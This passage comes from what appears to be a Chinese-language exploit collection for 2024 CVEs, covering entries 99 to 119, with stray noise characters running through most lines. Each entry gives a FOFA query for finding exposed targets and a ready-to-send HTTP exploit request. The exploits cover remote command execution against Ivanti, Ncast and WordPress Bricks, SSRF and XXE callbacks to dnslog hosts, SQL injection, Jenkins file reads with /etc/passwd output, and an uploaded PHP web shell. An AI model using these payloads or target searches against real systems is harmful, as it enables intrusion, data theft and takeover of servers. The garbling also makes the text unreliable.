$ t3 @8 R' V* b3 F5 C6 nContent-Type: application/x-www-form-urlencoded; charset=UTF-8/ z+ s9 M4 h- U' `$ N
X-Requested-With: XMLHttpRequest
! K2 ?0 p0 w: T( B, x0 b1 @2 R2 k0 O+ z* n9 M& x. Y1 D
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B( ~; Y# y4 ] w7 A8 ~7 a
5 y+ {7 b2 U& T* T" h7 m
" K' c1 [+ Q7 c6 I
99. Ncast盈可视高清智能录播系统busiFacade RCE
6 ^8 `& L2 q2 e& T8 o/ I9 }CVE-2024-0305% s/ N: C! F/ f7 \% n& c
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
4 k& d' I, t* C9 |8 }% gPOST /classes/common/busiFacade.php HTTP/1.10 ~$ a% C7 V, j9 {( L$ b0 i
Host: 192.168.40.130:80803 C* O6 g- U: C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 y9 X3 \# w, A3 ?: @0 I
Connection: close
" R# d' c- _* ]# H" `Content-Length: 1540 z" B" m+ i$ l6 k0 k0 V7 e
Accept: */*$ X/ F' T* @" S" B. [1 W
Accept-Encoding: gzip, deflate
% x3 S9 l) E' }/ D2 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. ?1 t5 i& H1 d, L9 p& t; ~5 t$ f# f9 Z! @Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 g' |" M8 F0 E2 z- }6 N0 J1 ~% vX-Requested-With: XMLHttpRequest9 ]" s/ u, p; ^5 c$ x9 ?4 @
5 A* h/ T' |6 B* r" p%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
H4 @) g. l2 y1 z
, i! H' ?7 d1 I" x2 p2 S# U. l; s1 D, C B
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传8 }% \7 o7 k" z' `5 F6 d
CVE-2024-0352% O+ }5 B' ]4 Z6 s4 k
FOFA:icon_hash="874152924"/ Y! L7 x B `
POST /api/file/formimage HTTP/1.1 i$ t0 O8 r" n5 M6 d9 x
Host: 192.168.40.130! w5 H3 u' u* c i% K8 ~, G
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
9 A/ @! W2 R) \/ XConnection: close
% }5 |( p/ c3 ~ l2 S5 U0 dContent-Length: 201 J& h9 N* r9 J+ p! c6 ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
" I2 U \0 R5 a4 dAccept-Encoding: gzip3 k: A- E- ~8 z; m* m
) h: |$ X7 @# Y+ y& c------WebKitFormBoundarygcflwtei
: Y- a1 V4 c- y4 N2 aContent-Disposition: form-data; name="file";filename="IE4MGP.php"3 Z, N& l$ k; O$ m7 s
Content-Type: application/x-php
" b* u7 x, v- J: ~2 `$ e; t: e' a6 ]! X7 P5 b4 p$ C, q
2ayyhRXiAsKXL8olvF5s4qqyI2O+ N% i$ }! i# k; x
------WebKitFormBoundarygcflwtei--
& f( b3 X6 \ Q' z1 c3 K# I4 K$ {7 |! s' G% K2 h7 \
. ]( w" E$ \+ w8 o' F101. ivanti policy secure-22.6命令注入
* B6 A. U( Z) U( n3 H: m) [7 N; N" uCVE-2024-21887- K0 S- j/ F: T/ ^6 k; `8 k7 y
FOFA:body="welcome.cgi?p=logo"" ?$ w: c5 y2 t" V1 f
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.16 C, W# v/ G4 v$ L+ r/ S! Y
Host: x.x.x.xx.x.x.x, e" G( v) \% l3 t* L, _: ^4 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& }. _) c% N6 L6 h' y$ P' eConnection: close: p- j( `8 D& K O2 G
Accept-Encoding: gzip
( c- I4 {# B. N, q+ x* |0 E1 T$ q6 D- f* h9 h: }/ f7 N3 {
2 e7 A$ a& y# u3 H+ C" y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行" V, c( H: l& I4 G; i& t# B. h
CVE-2024-21893
( y7 {' Z- [: {+ ^$ i( ?FOFA:body="welcome.cgi?p=logo"
6 f* a; }- T! E' H7 O+ S/ EPOST /dana-ws/saml20.ws HTTP/1.1' `- A; w j3 j3 H/ Q) L6 t |) E
Host: x.x.x.x' K$ U# q1 S* @0 ~" b! R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* Z+ f8 M9 J, A* PConnection: close3 _4 P) o# [8 {+ N! [/ H2 X
Content-Length: 792( t* M* M6 R1 ]0 u2 F) b
Accept-Encoding: gzip. O7 \# j8 d7 _' z% ~
H2 S8 w4 X# m! \
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
n7 L( n" e! Z' T! d! n3 U( M( m) z3 W: ~
" y6 T: x# Z& D1 Q$ S- |103. Ivanti Pulse Connect Secure VPN XXE
& \* D, W" f6 F4 W3 P2 vCVE-2024-22024
( p4 @ P" F: IFOFA:body="welcome.cgi?p=logo"
5 |" Y2 V8 h% O9 J* m9 ~POST /dana-na/auth/saml-sso.cgi HTTP/1.1
% [2 n9 d1 w0 G& c6 a& _* l% wHost: 192.168.40.130:111) q1 y9 J1 G# U9 ~/ N8 P
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36# k/ ~$ p; Y# e
Connection: close- V4 _7 t( [$ O
Content-Length: 204
, m7 s# V* _. Q7 n" g" [* h9 XContent-Type: application/x-www-form-urlencoded
# h% c/ |( }2 sAccept-Encoding: gzip6 |! ~) n3 J, k* I
( K+ {) S C3 i3 g7 C4 N) c& T* m& HSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==3 X- h+ x# e& W3 o& b" {
+ p6 y( W" B" d
/ G }2 x1 e! w- J4 }
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下9 u$ D; x8 x; m' o( i
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>4 a% J( q$ D X: N. U
5 t, n3 Y' s# E& ?8 ?, t
( j& }3 H) K9 n$ j' q
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露' w8 A( I, E( b: R5 k" C' @, e
CVE-2024-0569
- j" O5 Z( m4 r! gFOFA:title="TOTOLINK"- Z% t1 r% R, V) P
POST /cgi-bin/cstecgi.cgi HTTP/1.1- `+ V( B) t1 j( O
Host:192.168.0.1
" q9 O! r& D1 ?2 a1 N! G" kContent-Length:41
% Q$ C& E+ D K V% O6 t6 |# e/ BAccept:application/json,text/javascript,*/*;q=0.019 W- U r1 G2 s1 b, m
X-Requested-with: XMLHttpRequest3 w1 C2 L6 V" ^7 w
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36& b+ f9 G& _8 x' H* B. K
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
( V, k) f: M' F% lOrigin: http://192.168.0.1
6 n% F, e1 V: A" A/ n/ F$ |Referer: http://192.168.0.1/advance/index.html?time=1671152380564
5 q: D& W1 R ~+ E! z3 ? G$ @Accept-Encoding:gzip,deflate
* `( P8 _4 ~6 E' X0 v" S9 ^7 EAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7' [5 y! c$ J2 _* p l# n$ W* @
Connection:close' h+ H; ~8 | D. ~) a
# G8 r2 v' w6 t) f5 D# J
{& x0 _ N% c1 P! v& ^* k% A
"topicurl":"getSysStatusCfg",8 j0 ^$ F J, H# G$ c! s8 \' O7 s, M
"token":""" W0 z# f8 T9 m, i# g; b
}
# \( i7 P0 O/ @8 u! R
6 `: I: L. {/ Q- p: \6 Y1 }2 l) f4 ~105. SpringBlade v3.2.0 export-user SQL 注入1 {. V# `2 @9 \: y# M5 X' l: i0 J$ t
FOFA:body="https://bladex.vip"5 G; N, {8 k8 r. d
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1. K# f' d4 o" _* j# o# _, |
, u& C! {& R4 s, A8 g8 j. I; P: ?
106. SpringBlade dict-biz/list SQL 注入/ _/ o. f9 Y: L6 {' w( |
FOFA:body="Saber 将不能正常工作"3 V% S8 j1 c8 Z/ q2 ]+ u! Y
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ v8 J$ M% l0 i/ O: WHost: your-ip
X, G: A. S w* V& F& XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ H1 O! j# p) B* m: t# U
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A. p3 p2 B7 q. y, ~
Accept-Encoding: gzip, deflate$ O; `, \; `" V2 z7 X' R ^* U1 A
Accept-Language: zh-CN,zh;q=0.9
. ?: W) u2 T) P* n* lConnection: close: w7 L7 O! U. X4 {6 C! I
; \/ o: W3 i) C" b
4 P6 T6 `4 O, G# p3 V
107. SpringBlade tenant/list SQL 注入
0 U( Y2 j# @$ xFOFA:body="https://bladex.vip"6 U E, @. m- G6 l
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
# [2 C: _/ A4 t1 kHost: your-ip0 _8 C& ^' w# J* {: c% R4 Z+ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 k9 c1 y/ A* d* k
Blade-Auth:替换为自己的' s4 G2 q; S5 r; k/ N
Connection: close
5 t6 z( y g3 C, R: \
0 C% i! v/ B1 ~& `! `3 a6 O' H, ^; i; x( R i- k
108. D-Tale 3.9.0 SSRF
! }, [# v& f% D# F0 j0 fCVE-2024-216420 O5 w% v! o8 X8 n
FOFA:"dtale/static/images/favicon.png"8 d5 x( r2 }, p" _8 C2 Z
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
: ?) ]3 f6 E6 \* D- uHost: your-ip! I& a/ X3 y; A, h1 Y% i0 S
Accept: application/json, text/plain, */*3 g2 U2 ]# U/ b8 G! V) V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, d$ O, e4 O' r+ r
Accept-Encoding: gzip, deflate
% U$ p- Y* n5 sAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
z/ n7 M2 j1 VConnection: close4 k5 L6 p& F' c9 u
+ s" J' n! f+ g) |4 R
, u6 ?+ J: v( u; e, l* w
109. Jenkins CLI 任意文件读取
0 n/ M" Q) N$ Y; I0 {0 `/ I/ BCVE-2024-23897
& H, O' ]/ r( J6 E/ B8 x* @FOFA:header="X-Jenkins"
( c/ _) ~7 R# W& @POST /cli?remoting=false HTTP/1.1( z8 W; c5 F; V' u; y3 I! h% k
Host:
0 C- n O; W1 x5 J8 q- ~! K! D: @Content-type: application/octet-stream
, I2 I; w7 q# V3 r; BSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
% Z& w4 o, C9 N8 K7 eSide: upload5 g1 Z7 N. }! j+ q' w* U% X; ^
Connection: keep-alive
1 j7 _! t0 Q8 J0 IContent-Length: 163: Z2 Z2 ?* q1 a/ J0 V% O2 W
9 A( K5 I% J" h2 F/ k y5 ]
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'- T8 K. t1 `' f
0 X# c' v# n8 ^
/ S6 b+ e+ l+ Q" }5 UPOST /cli?remoting=false HTTP/1.1- B% e9 E( _* J" i1 V' }7 C
Host:
% S5 v5 J; {0 [( I; \8 s: qSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
. U6 Q i7 _0 s, o7 R( K5 C7 K, ]4 wdownload- M7 Z- T! d1 B' ~/ @" `4 S* n
Content-Type: application/x-www-form-urlencoded
8 z# \ G5 @( _ JContent-Length: 0
$ C# e& B/ A% _- N b' u) q
* a) w8 t" x3 d; f7 V& p
|" e' a7 b& v& ]ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
" A# r$ v5 u- { U7 ^java -jar jenkins-cli.jar help( _" Q: b& Y3 q& y& ^
[COMMAND]
, J. T% n4 m: s, LLists all the available commands or a detailed description of single command.- K* J1 R! C3 U v# M2 x
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
* E4 D o* p# o
' C2 L5 R$ E+ Q- @8 z( n) `9 Y" ?. z o7 N" w
110. Goanywhere MFT 未授权创建管理员
: _8 j/ |) U: l$ _* bCVE-2024-0204' ^0 ~) m) y) u+ }; g5 r* L
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"' ^1 T! W4 S# `0 P/ w" X0 C
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" r* [1 w6 l) V1 w, _0 t
Host: 192.168.40.130:8000
" k( w2 F' v& ?' ~7 vUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
* @: v8 K+ M' J7 o& IConnection: close- Q) T- q: t2 _1 d+ F, A4 W9 J
Accept: */*) D$ Q6 u$ B7 I' K+ l; p
Accept-Language: en
7 C9 p* C% f3 rAccept-Encoding: gzip) k$ W1 V; K% H' y" \- \
# U9 n: I* p3 t' Q: d$ h; D( y
1 R W+ X) ]1 z6 q- F$ S- `" T
111. WordPress Plugin HTML5 Video Player SQL注入6 y+ i7 J" b, @+ G% @( E
CVE-2024-1061
" b m4 Y1 Q" wFOFA:"wordpress" && body="html5-video-player"# {5 n) R+ i0 k) t: T- L1 i/ z
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.10 [4 p7 ]" h" O' ?! J E9 O+ L
Host: 192.168.40.130:1127 [: z% u- V! Y H3 V3 U% k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 a/ \4 s+ e7 G' n& K) u/ {# v' YConnection: close
# `2 R/ I; z* B/ {3 j+ N# x6 h5 V9 MAccept: */** I4 J: d& |" b5 u& I, g
Accept-Language: en
% D: K: e* Y1 c, R8 M- gAccept-Encoding: gzip
( u5 E2 _9 W* I( L2 s9 G1 @6 @ _! M3 c4 ]) X) _$ d
. G5 \# R: O. ]$ U112. WordPress Plugin NotificationX SQL 注入
0 _7 m# y9 B G( Y; j, ]CVE-2024-1698/ l( U3 b J# }4 f0 q# p$ X
FOFA:body="/wp-content/plugins/notificationx") y& _& O0 _+ X8 v
POST /wp-json/notificationx/v1/analytics HTTP/1.15 J- N: D. S) O4 M
Host: {{Hostname}}8 ?) p2 Q3 h% D* Z: |3 b# I
Content-Type: application/json
8 n: m$ O" D# O/ ~; i
8 v! t( i* `* d0 V: S4 i! W. p V{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
8 }$ N7 ]! D; q- q+ R ?
4 z6 {9 _, D$ }
. L. \; j; \" U, O: g! {' O9 `113. WordPress Automatic 插件任意文件下载和SSRF
- v$ H0 c( P3 ?: m* c% R7 u- VCVE-2024-27954
5 h, i! M: Y: s2 @* b' d# i- nFOFA:"/wp-content/plugins/wp-automatic"
( u1 p7 J# C6 K/ BGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
% i- V& R4 R% F6 ? K3 ?8 {! K7 cHost: x.x.x.x1 c9 n# \9 x# h* _7 y
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ P/ ^2 ~# V$ E1 hConnection: close: x; P8 J) H! Q a \9 q- f+ v
Accept: */*
$ ]/ t' {% H- M$ e: C& r9 lAccept-Language: en, |0 o4 V( q4 H [1 f
Accept-Encoding: gzip
! U' v$ x0 P8 E$ k6 I
# ^+ `: b% c6 v, b1 P+ F
! J9 g8 J+ X, _. f0 j# }5 `114. WordPress MasterStudy LMS插件 SQL注入+ u) m9 W! y& j6 i7 U
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"5 S+ c' d8 n% k. }% Q
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.14 y3 N0 R- g; t) h8 ?, a
Host: your-ip
' l) F% u+ y x- e6 q2 r4 UUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. \4 {; d! I* o/ V* FAccept-Charset: utf-8+ D8 S2 P3 z9 b. E9 L
Accept-Encoding: gzip, deflate7 w& m g' `1 p' }
Connection: close
+ N. i' `* i$ c4 T. j* H' }6 P( c) [ D6 y( V* \: p7 m
2 w+ [( G( I1 }115. WordPress Bricks Builder <= 1.9.6 RCE
; F8 n; ]4 `5 O& |+ z. @0 `CVE-2024-25600
6 T! s0 L% z1 {1 S( v5 d1 oFOFA: body="/wp-content/themes/bricks/"6 J8 o* P A8 B3 P3 ^( H) J' w
第一步,获取网站的nonce值/ t i5 e6 |0 C* H7 z
GET / HTTP/1.1# ~- V1 ]0 C0 E' n: ~8 I, @
Host: x.x.x.x
: C B, Q/ z! }. Q& kUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
* v; L$ J+ b3 KConnection: close
! [0 h0 x( |+ d0 a5 a$ O% E' eAccept-Encoding: gzip
+ f. E2 b6 J9 v T3 E" \
- i: N9 g" O1 o4 U
# }* [# I! T! }/ D1 g9 w第二步替换nonce值,执行命令
1 n4 ]% E; k. u3 O s) ^# g% ePOST /wp-json/bricks/v1/render_element HTTP/1.1 K/ F1 a# A# s
Host: x.x.x.x1 Z! A7 G' P" a1 l3 l: u6 k x- x' k# D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) D7 A. X5 J) _5 K
Connection: close
d2 ~* D3 W$ F4 A( o5 Z3 pContent-Length: 3563 W4 Y1 b/ V+ O
Content-Type: application/json
" S5 J5 \! {& pAccept-Encoding: gzip
- i- u M! ]& M; d; G# \" G4 s3 C% x1 `6 p: X! z7 M8 H
{0 r+ c7 E( c% b5 g8 b4 ~3 P# j
"postId": "1"," k6 G0 E6 @. w* Z% e: V' ^
"nonce": "第一步获得的值",
) c: p& i7 s, U9 e6 H "element": {
% i# X8 p5 w5 i& B3 }0 q9 _& C# f "name": "container",
2 ~9 A5 {* K: q) _* Y "settings": {
2 d( r0 ]+ `. f z' T4 k* ? "hasLoop": "true",
, O6 V" N6 T, l/ ?9 P "query": {
3 F, M1 m- X+ `. @' W "useQueryEditor": true,
& a1 M. ]) o' m* @5 Z1 K) m "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
7 `1 p' O4 T. [ b: h0 u "objectType": "post"9 V$ `% S! O/ }$ x
}
* ]$ C+ w" q: P8 D }0 Q2 i4 Y" N' G) S
}
# U; ~7 ?8 z; g5 O l$ R, c}
0 Q# k% u( r( H- [7 |8 D3 _; j
/ h7 S5 V% M( o' `2 z+ W# Z) I, T: Q; V6 [* h* [) H9 J
116. wordpress js-support-ticket文件上传
8 ~1 {6 m5 i B( _, E% x( J" J1 nFOFA:body="wp-content/plugins/js-support-ticket"
) T; T0 U$ F @" ?2 lPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1) f. d( G/ x; o
Host:
6 z( B' z- c% U/ ^- U" T. O: K& gContent-Type: multipart/form-data; boundary=--------767099171
5 V. \% s! \1 s, e% wUser-Agent: Mozilla/5.0% m8 x6 M* G! [( k4 Z' ?
7 \& Y+ E" B! b# n
----------767099171. E* U# [% u# o, \( u
Content-Disposition: form-data; name="action"
2 P, Q: v4 W2 Z, E2 }) k8 jconfiguration_saveconfiguration: z; `+ _( W- z5 P1 f5 [
----------767099171 {# s7 H4 j" [( p u" q- P
Content-Disposition: form-data; name="form_request"+ L1 W& W# \( m; h! J
jssupportticket1 _5 R8 Y1 I+ v! z! h' m
----------767099171. Z3 g. K+ m6 m$ c. O n8 o% u
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"$ v, M" D; ?* }! S9 I
Content-Type: image/png
3 o" ?- C1 z( i----------767099171--$ Q m6 B, _: C5 A
0 D7 z& @! C# r: J
2 v2 y9 j: G3 D2 C$ e
117. WordPress LayerSlider插件SQL注入
: F! e* k2 |$ [* v( bversion:7.9.11 – 7.10.03 n0 x9 J3 L: U c4 k
FOFA:body="/wp-content/plugins/LayerSlider/"
! p$ G2 L6 q2 [# H5 H" {GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1 `' ]2 n6 Q- [1 t+ K6 ]$ I7 e% t
Host: your-ip
7 C; [ v, f. v( c# F3 b wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ P6 g+ _" E. {# y w Y( b' {" H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 a S: @+ M* RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 _4 S$ [# U4 V* z8 `
Accept-Encoding: gzip, deflate, br/ G( f$ E( _: C/ w- d9 e( e
Connection: close
& a% T9 e1 }; \9 }8 OUpgrade-Insecure-Requests: 13 J5 e# h; }: E
8 \5 f& {# c1 }5 ~! x8 t6 C
% c8 t' X; k" g0 G% \3 o+ Z118. 北京百绰智能S210管理平台uploadfile.php任意文件上传2 N3 O& O K( L
CVE-2024-09391 H( D3 y* d r0 @# x7 H$ N
FOFA:title="Smart管理平台"0 y! S$ @- Y! F/ S$ v W7 s
POST /Tool/uploadfile.php? HTTP/1.1
; w7 e; `7 A6 s/ ]Host: 192.168.40.130:8443
4 \( d! b" m8 D+ n+ G. u. Z1 JCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
M6 \) }* [/ }+ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0: K5 f- v2 M6 e; u. \- \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 l: h/ n. }% w. g7 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) O3 i+ f- h* U- p4 Q- |Accept-Encoding: gzip, deflate
, U' {2 |, t. U! x. NContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
4 N% }0 N! y- v4 _& W" a8 R7 } rContent-Length: 405
- _$ a4 h3 z* G' i- WOrigin: https://192.168.40.130:8443% p& y7 B7 Z) Z5 w
Referer: https://192.168.40.130:8443/Tool/uploadfile.php" i7 g* B& ^4 G) P
Upgrade-Insecure-Requests: 1+ V! t( O' G$ \' Y) P
Sec-Fetch-Dest: document
- e. z6 I+ J+ hSec-Fetch-Mode: navigate* S: z2 j2 c7 H) t
Sec-Fetch-Site: same-origin
: M; K# `! P: F) @Sec-Fetch-User: ?1
- W* S# c, F" ?; j+ [: ]; ATe: trailers# q/ G; _) n# {
Connection: close
6 L$ ^( I5 V2 b2 M [, f/ ?5 r1 E& }# K. h# S; b* ~
-----------------------------13979701222747646634037182887
* s$ p. [! i7 PContent-Disposition: form-data; name="file_upload"; filename="contents.php"
{1 S7 ~; A5 V/ A0 Q0 ?& ZContent-Type: application/octet-stream0 T" T9 e3 R: p+ ?( L/ t! r: e
- \0 k' d; \! d3 g) z ]+ ?
<?php; o2 ]# }4 h K9 t
system($_POST["passwd"]);
9 ?8 P: Y7 |9 }+ w) h/ }2 f/ ]3 |?>
* u3 M9 a( ~) U$ W4 e9 t# ? t-----------------------------13979701222747646634037182887
: E" ~5 _! r, Q( X* eContent-Disposition: form-data; name="txt_path"
8 x: }! z" R/ ]2 e! P1 |+ c
- S9 N5 ~; h ?8 S% r' P* S/home/src.php
! q w5 ]& D# l; G- A-----------------------------13979701222747646634037182887--2 j+ A5 i# z' {1 d# x$ N% j
) v; A3 ?, H" M1 T: ]& N3 t! Z% C- s% i7 C4 Z* I& n5 O6 H+ v! ]
访问/home/src.php8 S" |0 c+ e ?- k% A
1 Y' K9 p' ?' y* s5 i9 d119. 北京百绰智能S20后台sysmanageajax.php sql注入/ a, w, Q9 Z2 F L! e, _
CVE-2024-1254
$ p1 f; o6 [( ?4 n2 @8 I5 VFOFA:title="Smart管理平台"
7 N+ Z5 v/ B$ A+ d先登录进入系统,默认账号密码为admin/admin
! ` \% r# k: ?! K: `$ o, n' W3 tPOST /sysmanage/sysmanageajax.php HTTP/1.11
% y( W9 V; t$ d# v( e" O- }+ CHost: x.x.x.x
: [, h: W: @6 |: oCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee5 y! Z$ z& T+ _5 E) ^% J/ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0$ Y% T8 L5 u) I' m" o
Accept: */*4 k' n* l, Z( Z K7 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 ]% i' L. M& ]: R0 U8 n5 X
Accept-Encoding: gzip, deflate
$ `0 S8 |! S2 U ]Content-Type: application/x-www-form-urlencoded;3 Q# L/ N" i% S% g0 F+ O& G8 k, b
Content-Length: 109
- w& q- K! N* x: Q# n2 e! kOrigin: https://58.18.133.60:84436 j: S5 Y5 Q5 H( R' S
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php t# K$ s# O; \* C1 O7 ~
Sec-Fetch-Dest: empty
& v8 |* j9 U' YSec-Fetch-Mode: cors
4 \3 e2 {: W7 o; WSec-Fetch-Site: same-origin5 n& n' f. n8 M# N
X-Forwarded-For: 1.1.1.1+ K9 W' G/ R1 B& H; { h& S. l
X-Originating-Ip: 1.1.1.1* ]/ g u, Z$ E
X-Remote-Ip: 1.1.1.1, o+ c& | Y+ y' m7 R
X-Remote-Addr: 1.1.1.1
- X+ t, K# b5 u* F5 A" jTe: trailers1 ?/ C6 z* \( H2 k
